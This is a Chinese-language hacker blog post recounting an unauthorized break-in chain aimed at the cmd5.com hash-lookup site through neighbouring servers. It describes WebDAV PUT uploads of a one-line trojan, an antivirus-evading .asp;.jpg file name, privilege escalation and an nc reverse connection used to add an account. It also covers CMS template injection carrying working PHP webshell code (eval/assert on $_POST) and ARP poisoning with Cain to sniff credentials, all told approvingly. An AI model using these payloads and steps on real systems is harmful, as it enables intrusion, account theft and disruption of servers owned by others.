文章作者:黑鹰小子/BlAck.Eagle【B.H.S.T】
提起cmd5.com,估计安全圈子的朋友都很熟悉,笔者也非常厌烦它现在的盈利模式,比较简单的英文字母,现在也都成了收费的,于是萌发了这个邪恶的想法。
每次做测试的时候,笔者一般都构思下流程,这次也不例外,这种网站一般还是需要从嗅探入手,笔者准备首先利用Zwell的IIS put Scanner简单的扫描下目标网段的web服务器结构,因为它能帮助我们把很多有用的banner都扫描出来。

\


笔者通过扫描,发现存在了PUT为On的一个IP,很多时候存在PUT为yes,但是上传失败,可能是webdav被禁用或者目录没有写权限。然后利用老兵的iiswrite工具写入一句话马,写入成功,然后通过“MOVE”来改为ASP格式,但是这时候经常出错,最后只有改为.asp;.jpg这种格式才逃脱杀软的毒手。然后通过一句话客户端,上传了很多次都是服务器500错误,木马被杀,最后通过消灭和Psjj兄弟提供的webshell,成功。

\


简单看了下权限,还算比较大,通过webshell的下载功能上传了cmd,提权大杀器pr,nc。通过NC反弹到本地并且添加了一个用户,顺利添加了账户。并且成功登陆服务器。

\


到达服务器一般是先把服务器的洞子给补上,首先将“Web服务扩展”中的WebDAV给禁止,然后将网站属性,主目录的写入给去掉就可以了!

\


这时候,笔者才回过头来看目标站点,首先是简单ping了下cmd5.com的站点,无法ping通,然后通过ipconfig/all看了下子网掩码,发现子网掩码是255.255.255.128,哎,真的失望了,和目标不在一个网段,但是接下来,目标更加清晰了,只用到125.254.44.126去渗透一台服务器就好了,不出意外就会跟目标是同一个网段。

\


说干就干,和朋友饮恨操刀上了,这时候在目标2xx网段,利用简单社工的账户进入了某php168后台,这里需要说明的是,该php168系统已经是最新版本,通过模板那里直接添加大马已经不行,写入马后,就会马上被清了,然后笔者想到了select into这种方法,但是也失败了,提示信息是服务器拒绝这个普通的mysql账户。

\

\

折腾了很久没办法,在好友Robert的提醒下,笔者打算通过添加一个普通的模板文件,
Template/default/none.htm,通过写入
<script language="php">phpinfo()</script>
tested by black.eagle
这种文件,然后再“系统设置”-“网站首页设置”,点击提交,然后把首页生成静态页

\

\


大家可以看到oo.php确实已经执行了,但是笔者在none.htm,写为
<script language="php">
fputs(fopen("horind.php","w"),"<?eval($_POST[cmd]);?>")
</script>
tested by black.eagle
的话,eval被过滤为了eva l写为下面这种格式的话,确实写入了,但是无法通过一句话马的客户端“专家模式”来执行
<script language="php">assert($_POST[cmd])</script>
tested by black.eagle

\

至此告一段落,然后在寻寻觅觅中拾得一PHPCMS后台,这个后台也没少了瞎折腾,虽说phpcms拿webshell简单,这里无法执行sql,给管理禁用了,然后通过
admin.php?mod=phpcms&file=safe&action=see_code&files=eagle.php这种格式,由于写入种
种小马的原因没有成功,也希望各位看官以后直接上大马。

\

 
拿到了webshell,并且这管理的疏忽,系统权限到手!

\

 
看了下子网掩码,和cmd5.com同网段,好男儿,操刀上了!判断了网关,为.129,ping和tracert对方的IP都不通,看来有防火墙,ARP防火墙不好突破,那么只有稍微改变下cain的发包间隔,即毒化远程ARP缓存每隔19秒,默认的是30秒!

\

 
确实也嗅探了一些账号。

\

 
只不过,嗅探了一会机器就挂掉了,ping的时候说是目标网段不可达,笔者只能等到第二天,那么只能让IDC的客服帮我们重启下了啊,虽说是知道了,长城宽带的机房,但是不知道是哪个IDC啊,没办法,笔者先找了个该网段的站点,加了他们站长聊了下,成功获取信息。

\